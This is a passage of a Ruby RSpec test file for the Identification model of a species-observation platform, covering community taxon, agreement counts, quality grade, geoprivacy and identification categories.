inactive_taxon = Taxon.make!( is_active: false )
expect( Identification.make!( taxon: inactive_taxon ).taxon ).to eq inactive_taxon
end
it "should not replace the taxon if there are multiple active equivalents" do
taxon_change = make_taxon_split
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.input_taxon
end
end
end
describe "with callbacks" do
it "should make older identifications not current" do
old_ident = Identification.make!
new_ident = Identification.make!( observation: old_ident.observation, user: old_ident.user )
expect( new_ident ).to be_valid
expect( new_ident ).to be_current
old_ident.reload
expect( old_ident ).not_to be_current
end
it "should not allow 2 current observations per user" do
ident1 = Identification.make!
ident2 = Identification.make!( user: ident1.user, observation: ident1.observation )
ident1.reload
ident2.reload
expect( ident1 ).not_to be_current
expect( ident2 ).to be_current
ident1.update_attributes( current: true )
ident1.reload
ident2.reload
expect( ident1 ).to be_current
expect( ident2 ).not_to be_current
end
it "should add a taxon to its observation if it's the observer's identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
identification = Identification.make!(:user => obs.user, :observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
end
it "should add a taxon to its observation if it's someone elses identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
expect(obs.community_taxon).to be_blank
end
it "shouldn't add a taxon to its observation if it's someone elses identification but the observation user rejects community IDs" do
u = User.make!(:prefers_community_taxa => false)
obs = Observation.make!(:user => u)
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
end
it "shouldn't create an ID by the obs owner if someone else adds an ID" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.identifications.count).to eq 0
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).not_to be_blank
expect(obs.identifications.count).to eq 1
end
it "should not modify species_guess to an observation if there's a taxon_id and the taxon_id didn't change" do
obs = Observation.make!
taxon = Taxon.make!
taxon2 = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
user = User.make!
identification = Identification.make!(
:user => user,
:observation => obs,
:taxon => taxon2
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add a species_guess to a newly identified observation if the owner identified it and the species_guess was nil" do
obs = Observation.make!
taxon = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add an iconic_taxon_id to its observation if it's the observer's identification" do
obs = Observation.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs
)
obs.reload
expect(obs.iconic_taxon_id).to eq identification.taxon.iconic_taxon_id
end
it "should increment the observations num_identification_agreements if this is an agreement" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_count = obs.num_identification_agreements
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_count+1
end
it "should increment the observation's num_identification_agreements if this is an agreement and there are outdated idents" do
taxon = Taxon.make!
obs = Observation.make!(:taxon => taxon)
old_ident = Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq(1)
obs.reload
Identification.make!(:observation => obs, :user => old_ident.user)
obs.reload
expect(obs.num_identification_agreements).to eq(0)
end
it "should increment the observations num_identification_disagreements if this is a disagreement" do
obs = Observation.make!(:taxon => Taxon.make!)
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count+1
end
it "should NOT increment the observations num_identification_disagreements if the obs has no taxon" do
obs = Observation.make!
old_count = obs.num_identification_disagreements
Identification.make!(:observation => obs)
obs.reload
expect(obs.num_identification_disagreements).to eq old_count
end
it "should NOT increment the observations num_identification_agreements or num_identification_disagreements if theres just one ID" do
taxon = Taxon.make!
obs = Observation.make!
old_agreement_count = obs.num_identification_agreements
old_disagreement_count = obs.num_identification_disagreements
expect(obs.community_taxon).to be_blank
Identification.make!(:observation => obs, :taxon => taxon)
obs.reload
expect(obs.num_identification_agreements).to eq old_agreement_count
expect(obs.num_identification_disagreements).to eq old_disagreement_count
expect(obs.community_taxon).to be_blank
expect(obs.identifications.count).to eq 1
end
it "should consider an identification with a taxon that is a child of " +
"the observation's taxon to be in agreement" do
taxon = Taxon.make!(rank: Taxon::SPECIES)
parent = Taxon.make!(rank: Taxon::GENUS)
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => parent, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => taxon)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be true
end
it "should not consider an identification with a taxon that is a parent " +
"of the observation's taxon to be in agreement" do
taxon = Taxon.make!
parent = Taxon.make!
taxon.update_attributes(:parent => parent)
observation = Observation.make!(:taxon => taxon, :prefers_community_taxon => false)
identification = Identification.make!(:observation => observation, :taxon => parent)
expect(identification.user).not_to be(identification.observation.user)
expect(identification.is_agreement?).to be false
end
it "should not consider identifications of different taxa in the different lineages to be in agreement" do
taxon = Taxon.make!( rank: Taxon::GENUS )
child = Taxon.make!( parent: taxon, rank: Taxon::SPECIES)
o = Observation.make!(:prefers_community_taxon => false)
ident = Identification.make!(:taxon => child, :observation => o)
disagreement = Identification.make!(:observation => o, :taxon => taxon)
expect(disagreement.is_agreement?).to be false
end
it "should update observation quality_grade" do
o = make_research_grade_candidate_observation(taxon: Taxon.make!(rank: Taxon::SPECIES))
expect( o.quality_grade ).to eq Observation::NEEDS_ID
i = Identification.make!(:observation => o, :taxon => o.taxon)
o.reload
expect( o.quality_grade ).to eq Observation::RESEARCH_GRADE
end
it "should trigger setting a taxon photo if obs became research grade" do
t = Taxon.make!( rank: Taxon::SPECIES )
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 0
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should not trigger setting a taxon photo if obs was already research grade" do
o = without_delay { make_research_grade_observation }
o.taxon.taxon_photos.delete_all
expect( o.taxon.photos.count ).to eq 0
i = without_delay { Identification.make!( observation: o, taxon: o.taxon ) }
o.reload
expect( o.taxon.photos.count ).to eq 0
end
it "should not trigger setting a taxon photo if taxon already has a photo" do
t = Taxon.make!( rank: Taxon::SPECIES )
t.photos << LocalPhoto.make!
o = make_research_grade_candidate_observation
expect( o ).not_to be_research_grade
expect( t.photos.size ).to eq 1
without_delay do
Identification.make!( observation: o, taxon: t )
Identification.make!( observation: o, taxon: t )
end
o.reload
t.reload
expect( o ).to be_research_grade
expect( t.photos.size ).to eq 1
end
it "should update observation quality grade after disagreement when observer opts out of CID" do
o = make_research_grade_observation(:prefers_community_taxon => false)
expect(o).to be_research_grade
i = Identification.make!(observation: o, taxon: Taxon.make!(:species))
Identification.make!(observation: o, taxon: i.taxon)
o.reload
expect(o).not_to be_research_grade
o.owners_identification.destroy
o.reload
expect(o.owners_identification).to be_blank
Identification.make!(user: o.user, observation: o, taxon: i.taxon)
o.reload
expect(o).to be_research_grade
end
it "should obscure the observation's coordinates if the taxon is threatened" do
o = Observation.make!(:latitude => 1, :longitude => 1)
expect(o).not_to be_coordinates_obscured
i = Identification.make!(:taxon => make_threatened_taxon, :observation => o, :user => o.user)
o.reload
expect(o).to be_coordinates_obscured
end
it "should set the observation's community taxon" do
t = Taxon.make!
o = Observation.make!(:taxon => t)
expect(o.community_taxon).to be_blank
i = Identification.make!(:observation => o, :taxon => t)
o.reload
expect(o.community_taxon).to eq(t)
end
it "should touch the observation" do
o = Observation.make!
updated_at_was = o.updated_at
op = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(updated_at_was).to be < o.updated_at
end
it "creates observation reviews if they dont exist" do
o = Observation.make!
expect(o.observation_reviews.count).to eq 0
Identification.make!(observation: o, user: o.user)
o.reload
expect(o.observation_reviews.count).to eq 1
end
it "updates existing reviews" do
o = Observation.make!
r = ObservationReview.make!(observation: o, user: o.user, updated_at: 1.day.ago)
Identification.make!(observation: o, user: o.user)
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first.updated_at ).to be > r.updated_at
end
it "marks existing unreviewed reviews as reviewed" do
o = Observation.make!
r = ObservationReview.make!( observation: o, user: o.user )
r.update_attributes( reviewed: false )
Identification.make!( observation: o, user: o.user )
o.reload
expect( o.observation_reviews.first ).to eq r
expect( o.observation_reviews.first ).to be_reviewed
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Delayed::Worker.new.work_off
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the observation's taxon_geoprivacy if taxon was threatened" do
t = make_threatened_taxon
o = Observation.make!
expect( o.taxon_geoprivacy ).to be_blank
i = Identification.make!( taxon: t, observation: o )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
describe "with indexing" do
elastic_models( Observation, Identification )
it "should make older identifications not current in elasticsearch" do
old_ident = Identification.make!
without_delay do
Identification.make!( observation: old_ident.observation, user: old_ident.user )
end
es_response = Identification.elastic_search( where: { id: old_ident.id } ).results.results.first
expect( es_response.id.to_s ).to eq old_ident.id.to_s
old_ident.reload
expect( old_ident ).not_to be_current
expect( es_response.current ).to be false
end
describe "user counter cache" do
it "should incremement for an ident on someone else's observation, with delay" do
taxon = Taxon.make!
obs = Observation.make!(taxon: taxon)
user = User.make!
Delayed::Job.destroy_all
expect( Delayed::Job.count ).to eq 0
expect( user.identifications_count ).to eq 0
Identification.make!(user: user, observation: obs, taxon: taxon)
expect( Delayed::Job.count ).to be > 1
user.reload
expect( user.identifications_count ).to eq 0
Delayed::Worker.new.work_off
user.reload
expect( user.identifications_count ).to eq 1
end
it "should NOT incremement for an ident on one's OWN observation" do
user = User.make!
obs = Observation.make!(user: user)
expect {
without_delay{ Identification.make!(user: user, observation: obs) }
}.to_not change(user, :identifications_count)
end
end
end
end
end
describe Identification, "updating" do
it "should not change current status of other identifications" do
i1 = Identification.make!
i2 = Identification.make!(:observation => i1.observation, :user => i1.user)
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
i1.update_attributes(:body => "foo")
i1.reload
i2.reload
expect(i1).not_to be_current
expect(i2).to be_current
end
describe "observation taxon_geoprivacy" do
it "should change if becomes current" do
threatened = make_threatened_taxon( rank: Taxon::SPECIES )
not_threatened = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: threatened )
i1 = o.identifications.first
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
i2 = Identification.make!( user: i1.user, observation: o, taxon: not_threatened )
o.reload
expect( o.taxon_geoprivacy ).to be_blank
i1.reload
i1.update_attributes( current: true )
o.reload
expect( o.taxon_geoprivacy ).to eq Observation::OBSCURED
end
end
end
describe Identification, "deletion" do
it "should remove the taxon associated with the observation if it's the observer's identification and obs does not prefers_community_taxon" do
observation = Observation.make!( taxon: Taxon.make!, prefers_community_taxon: false )
identification = Identification.make!( observation: observation, taxon: observation.taxon )
expect( observation.taxon ).not_to be_blank
expect( observation ).to be_valid
expect( observation.identifications.length ).to be >= 1
doomed_ident = observation.identifications.select do |ident|
ident.user_id == observation.user_id
end.first
expect( doomed_ident.user_id ).to eq observation.user_id
doomed_ident.destroy
observation.reload
expect( observation.taxon_id ).to be_blank
end
it "should NOT remove the taxon associated with the observation if it's the observer's identification and obs prefers_community_taxon " do
observation_prefers_community_taxon = Observation.make!( taxon: Taxon.make! )
identification_prefers_community_taxon = Identification.make!(
observation: observation_prefers_community_taxon,
taxon: observation_prefers_community_taxon.taxon
)
expect( observation_prefers_community_taxon.taxon ).not_to be_nil
expect( observation_prefers_community_taxon ).to be_valid
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.identifications.length ).to be >= 1
doomed_ident = observation_prefers_community_taxon.identifications.select do |ident|
ident.user_id == observation_prefers_community_taxon.user_id
end.first
expect( doomed_ident.user_id ).to eq observation_prefers_community_taxon.user_id
doomed_ident.destroy
observation_prefers_community_taxon.reload
expect( observation_prefers_community_taxon.taxon_id ).not_to be_nil
end
it "should decrement the observation's num_identification_agreements if this was an agreement" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
expect( o.num_identification_agreements ).to eq 1
i.destroy
o.reload
expect( o.num_identification_agreements ).to eq 0
end
it "should decrement the observations num_identification_disagreements if this was a disagreement" do
o = Observation.make!( taxon: Taxon.make! )
ident = Identification.make!( observation: o )
o.reload
expect( o.num_identification_disagreements ).to be >= 1
num_identification_disagreements = o.num_identification_disagreements
ident.destroy
o.reload
expect( o.num_identification_disagreements ).to eq num_identification_disagreements - 1
end
it "should decremement the counter cache in users for an ident on someone else's observation" do
i = Identification.make!
expect( i.user ).not_to be i.observation.user
old_count = i.user.identifications_count
user = i.user
i.destroy
user.reload
expect( user.identifications_count ).to eq 0
end
it "should NOT decremement the counter cache in users for an ident on one's OWN observation" do
new_observation = Observation.make!( taxon: Taxon.make! )
new_observation.reload
owners_ident = new_observation.identifications.select do |ident|
ident.user_id == new_observation.user_id
end.first
user = new_observation.user
old_count = user.identifications_count
owners_ident.destroy
user.reload
expect(user.identifications_count).to eq old_count
end
it "should update observation quality_grade" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.last.destroy
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should update observation quality_grade if made by another user" do
o = make_research_grade_observation
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
end
it "should not queue a job to update project lists if owners ident" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.owners_identification.destroy
Delayed::Job.delete_all
Identification.make!(:user => o.user, :observation => o, :taxon => Taxon.make!)
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /ProjectList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if changed from research grade" do
o = make_research_grade_observation
Delayed::Job.delete_all
stamp = Time.now
o.identifications.by(o.user).first.destroy
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should queue a job to update check lists if research grade" do
o = make_research_grade_observation
o.identifications.each {|ident| ident.destroy if ident.user_id != o.user_id}
o.reload
expect(o.quality_grade).to eq Observation::NEEDS_ID
stamp = Time.now
Delayed::Job.delete_all
Identification.make!(:taxon => o.taxon, :observation => o)
o.reload
expect(o.quality_grade).to eq Observation::RESEARCH_GRADE
jobs = Delayed::Job.where("created_at >= ?", stamp)
pattern = /CheckList.*refresh_with_observation/m
job = jobs.detect{|j| j.handler =~ pattern}
expect(job).not_to be_blank
# puts job.handler.inspect
end
it "should nilify curator_identification_id on project observations if no other current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i)
po.reload
expect(po.curator_identification).not_to be_blank
expect(po.curator_identification_id).to eq i.id
i.destroy
po.reload
expect(po.curator_identification_id).to be_blank
end
it "should set curator_identification_id on project observations to last current identification" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(:user => o.user, :project => p)
po = ProjectObservation.make!(:observation => o, :project => p)
i1 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i1)
i2 = Identification.make!(:user => p.user, :observation => o)
Identification.run_update_curator_identification(i2)
po.reload
expect(po.curator_identification_id).to eq i2.id
i2.destroy
Identification.run_revisit_curator_identification(o.id, i2.user_id)
po.reload
expect(po.curator_identification_id).to eq i1.id
end
it "should set the user's last identification as current" do
ident1 = Identification.make!
ident2 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident3 = Identification.make!(:observation => ident1.observation, :user => ident1.user)
ident2.reload
expect(ident2).not_to be_current
ident3.destroy
ident2.reload
expect(ident2).to be_current
ident1.reload
expect(ident1).not_to be_current
end
it "should set observation taxon to that of last current ident for owner" do
o = Observation.make!(:taxon => Taxon.make!)
ident1 = o.owners_identification
ident2 = Identification.make!(:observation => o, :user => o.user)
ident3 = Identification.make!(:observation => o, :user => o.user)
o.reload
expect(o.taxon_id).to eq(ident3.taxon_id)
ident3.destroy
o.reload
expect(o.taxon_id).to eq(ident2.taxon_id)
end
it "should set the observation's community taxon if remaining identifications" do
load_test_taxa
o = Observation.make!(:taxon => @Calypte_anna)
expect(o.community_taxon).to be_blank
i1 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i3 = Identification.make!(:observation => o, :taxon => @Calypte_anna)
i2 = Identification.make!(:observation => o, :taxon => @Pseudacris_regilla)
o.reload
expect(o.community_taxon).to eq(@Calypte_anna)
i1.destroy
o.reload
expect(o.community_taxon).to eq(@Chordata) # consensus
end
it "should remove the observation's community taxon if no more identifications" do
o = Observation.make!( taxon: Taxon.make! )
i = Identification.make!( observation: o, taxon: o.taxon )
o.reload
expect( o.community_taxon ).to eq o.taxon
i.destroy
o.reload
expect( o.community_taxon ).to be_blank
end
it "should remove the observation.taxon if there are no more identifications" do
o = Observation.make!
i = Identification.make!( observation: o )
expect( o.taxon ).to eq i.taxon
i.destroy
o.reload
expect( o.taxon ).to be_blank
end
it "destroys automatically created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 0
end
it "does not destroy user created reviews" do
o = Observation.make!
i = Identification.make!(observation: o, user: o.user)
o.observation_reviews.destroy_all
r = ObservationReview.make!(observation: o, user: o.user, user_added: true)
expect(o.observation_reviews.count).to eq 1
i.destroy
o.reload
expect(o.observation_reviews.count).to eq 1
end
end
describe Identification, "captive" do
elastic_models( Observation, Identification )
it "should vote yes on the wild quality metric if 1" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
expect(o.quality_metrics.first.user).to eq(i.user)
expect(o.quality_metrics.first).not_to be_agree
end
it "should vote no on the wild quality metric if 0 and metric exists" do
i = Identification.make!(:captive_flag => "1")
o = i.observation
expect(o.quality_metrics).not_to be_blank
i.update_attributes(:captive_flag => "0")
o.reload
expect(o.quality_metrics.first).not_to be_agree
end
it "should not alter quality metrics if nil" do
i = Identification.make!(:captive_flag => nil)
o = i.observation
expect(o.quality_metrics).to be_blank
end
it "should not alter quality metrics if 0 and not metrics exist" do
i = Identification.make!(:captive_flag => "0")
o = i.observation
expect(o.quality_metrics).to be_blank
end
end
describe Identification do
elastic_models( Observation, Identification )
it { is_expected.to belong_to :user }
it { is_expected.to belong_to :taxon_change }
it { is_expected.to belong_to(:previous_observation_taxon).class_name "Taxon" }
it { is_expected.to have_many(:project_observations).with_foreign_key(:curator_identification_id).dependent :nullify }
it { is_expected.to validate_presence_of :observation }
it { is_expected.to validate_presence_of :user }
it { is_expected.to validate_presence_of(:taxon).with_message "for an ID must be something we recognize" }
it { is_expected.to validate_length_of(:body).is_at_least(0).is_at_most(Comment::MAX_LENGTH).allow_blank.on :create }
describe "mentions" do
before { enable_has_subscribers }
after { disable_has_subscribers }
it "knows what users have been mentioned" do
u = User.make!
i = Identification.make!(body: "hey @#{ u.login }")
expect( i.mentioned_users ).to eq [ u ]
end
it "generates mention updates" do
u = User.make!
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq false
i = Identification.make!(body: "hey @#{ u.login }")
expect( UpdateAction.unviewed_by_user_from_query(u.id, notification: "mention") ).to eq true
end
end
describe "run_update_curator_identification" do
it "indexes the observation in elasticsearch" do
o = Observation.make!
p = Project.make!
pu = ProjectUser.make!(user: o.user, project: p)
po = ProjectObservation.make!(observation: o, project: p)
i = Identification.make!(user: p.user, observation: o)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 0
Identification.run_update_curator_identification(i)
expect( Observation.page_of_results(project_id: p.id, pcid: true).
total_entries ).to eq 1
end
end
end
describe Identification, "category" do
let( :o ) { Observation.make! }
let(:parent) { Taxon.make!( rank: Taxon::GENUS ) }
let(:child) { Taxon.make!( rank: Taxon::SPECIES, parent: parent ) }
describe "should be improving when" do
it "is the first that matches the community ID among several IDs" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
o.reload
i1.reload
expect( o.community_taxon ).to eq i1.taxon
expect( i1.observation.identifications.count ).to eq 2
expect( i1.category ).to eq Identification::IMPROVING
end
it "qualifies but isn't current" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
i3 = Identification.make!( observation: o, taxon: child, user: i1.user )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
it "is an ancestor of the community taxon and was not added after the first ID of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
i4 = Identification.make!( observation: o, taxon: child )
o.reload
expect( o.community_taxon ).to eq child
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
end
end
describe "should be maverick when" do
it "the community taxon is not an ancestor" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
i3 = Identification.make!( observation: o )
i3.reload
expect( i3.category ).to eq Identification::MAVERICK
end
end
describe "should be leading when" do
it "is the only ID" do
i = Identification.make!
expect( i.category ).to eq Identification::LEADING
end
it "has a taxon that is a descendant of the community taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: parent )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::LEADING
end
end
describe "should be supporting when" do
it "matches the community taxon but is not the first to do so" do
i1 = Identification.make!( observation: o )
i2 = Identification.make!( observation: o, taxon: i1.taxon )
expect( i2.category ).to eq Identification::SUPPORTING
end
it "descends from the community taxon but is not the first identification of that taxon" do
i1 = Identification.make!( observation: o, taxon: parent )
i2 = Identification.make!( observation: o, taxon: child )
i3 = Identification.make!( observation: o, taxon: child )
expect( i3.category ).to eq Identification::SUPPORTING
end
end
describe "examples: " do
describe "sequence of IDs along the same ancestry" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Chordata ),
Identification.make!( observation: o, taxon: @Aves ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte_anna )
]
@sequence.each(&:reload)
@sequence
end
it "should all be improving until the community taxon" do
o.reload
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
it "should be improving when it's the first to match the community ID" do
expect( @sequence[2].category ).to eq Identification::IMPROVING
end
it "should end with a leading ID" do
expect( @sequence.last.category ).to eq Identification::LEADING
end
it "should continue to have improving IDs even if the first identifier agrees with the last" do
first = @sequence[0]
i = Identification.make!( observation: o, taxon: @sequence[-1].taxon, user: first.user )
first.reload
@sequence[1].reload
expect( first ).not_to be_current
expect( first.category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::IMPROVING
end
end
end
describe "after withdrawing and restoring" do
before do
load_test_taxa
u1 = o.user
u2 = User.make!
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u1 ),
Identification.make!( observation: o, taxon: @Calypte, user: u2 ),
Identification.make!( observation: o, taxon: @Calypte_anna, user: u1 ),
]
@sequence.each(&:reload)
o.reload
@sequence
end
it "should not change" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[2].category ).to eq Identification::SUPPORTING
@sequence[2].update_attributes( current: false )
expect( @sequence[2] ).not_to be_current
@sequence[2].update_attributes( current: true )
@sequence[2].reload
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "conservative disagreement" do
before do
load_test_taxa
@sequence = [
Identification.make!( observation: o, taxon: @Calypte_anna ),
Identification.make!( observation: o, taxon: @Calypte ),
Identification.make!( observation: o, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should consider disagreements that match the community taxon to be improving" do
expect( o.community_taxon ).to eq @Calypte
expect( @sequence[1].category ).to eq Identification::IMPROVING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
# it "should consider the identification people disagreed with to be maverick" do
# expect( @sequence[0].category ).to eq Identification::MAVERICK
# end
end
describe "single user redundant identifications" do
before do
load_test_taxa
user = User.make!
@sequence = [
Identification.make!( observation: o, user: user, taxon: @Calypte ),
Identification.make!( observation: o, user: user, taxon: @Calypte )
]
@sequence.each(&:reload)
end
it "should leave the current ID as leading" do
expect( @sequence.last ).to be_current
expect( @sequence.last.category ).to eq Identification::LEADING
end
end
describe "disagreement within a genus" do
before do
load_test_taxa
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence << Identification.make!( observation: o, taxon: Taxon.make!( parent: @Calypte, rank: Taxon::SPECIES ) )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should have all leading IDs" do
expect( @sequence[0].category ).to eq Identification::LEADING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::LEADING
end
end
describe "disagreement with revision" do
before do
load_test_taxa
user = User.make!
@sequence = []
@sequence << Identification.make!( observation: o, taxon: @Calypte, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte_anna, user: user )
@sequence << Identification.make!( observation: o, taxon: @Calypte )
@sequence.each(&:reload)
o.reload
expect( o.community_taxon ).to eq @Calypte
end
it "should be improving, leading, supporting" do
expect( @sequence[0].category ).to eq Identification::IMPROVING
expect( @sequence[1].category ).to eq Identification::LEADING
expect( @sequence[2].category ).to eq Identification::SUPPORTING
end
end
describe "after taxon swap" do
let(:swap) { make_taxon_swap }
let(:o) { make_research_grade_observation( taxon: swap.input_taxon ) }
it "should be improving, supporting for acitve IDs" do
expect( o.identifications.sort_by(&:id)[0].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[1].category ).to eq Identification::SUPPORTING
swap.committer = swap.user
swap.commit
Delayed::Worker.new.work_off
o.reload
expect( o.identifications.sort_by(&:id)[2].category ).to eq Identification::IMPROVING
expect( o.identifications.sort_by(&:id)[3].category ).to eq Identification::SUPPORTING
end
end
describe "indexing" do
it "should happen for other idents after new one added" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
expect( i1.category ).to eq Identification::IMPROVING
es_i1 = Identification.elastic_search( where: { id: i1.id } ).results.results[0]
expect( es_i1.category ).to eq Identification::IMPROVING
end
it "should update this identification's category" do
i1 = Identification.make!
expect( i1.category ).to eq Identification::LEADING
i2 = Identification.make!( observation: i1.observation, taxon: i1.taxon )
i1.reload
i2.reload
expect( i1.category ).to eq Identification::IMPROVING
expect( i2.category ).to eq Identification::SUPPORTING
Delayed::Worker.new.work_off
es_i2 = Identification.elastic_search( where: { id: i2.id } ).results.results[0]
expect( es_i2.category ).to eq Identification::SUPPORTING
end
end
end
describe Identification, "disagreement" do
elastic_models( Observation )
before { load_test_taxa } # Not sure why but these don't seem to pass if I do before(:all)
it "should be nil by default" do
expect( Identification.make! ).not_to be_disagreement
end
it "should automatically set to true on create if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_observation( taxon: @Calypte_anna)
2.times { Identification.make!( observation: o, taxon: o.taxon ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
i.reload
expect( i ).to be_disagreement
end
it "should not be automatically set to true on update if the taxon is not a descendant or ancestor of the community taxon" do
o = make_research_grade_candidate_observation
i = Identification.make!( observation: o, taxon: @Calypte_anna )
4.times { Identification.make!( observation: o, taxon: @Pseudacris_regilla ) }
i.reload
expect( i ).not_to be_disagreement
end
it "should not be automatically set to true if no other identifications are current" do
o = Identification.make!( current: false ).observation
Identification.make!( observation: o, taxon: @Calypte_anna )
o.identifications.each { |i| i.update( current: false ) }
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i ).not_to be_disagreement
end
describe "implicit disagreement" do
it "should set disagreement to true" do
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: @Pseudacris_regilla )
expect( i.disagreement ).to eq true
end
it "should not set disagreement previous obs taxon was ungrafted" do
s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: s1 )
Identification.make!( observation: o, taxon: s1 )
i = Identification.make( observation: o, taxon: @Calypte_anna )
i.save!
expect( i.disagreement ).to be_nil
end
it "should not set disagreement if ident taxon is ungrafted" do
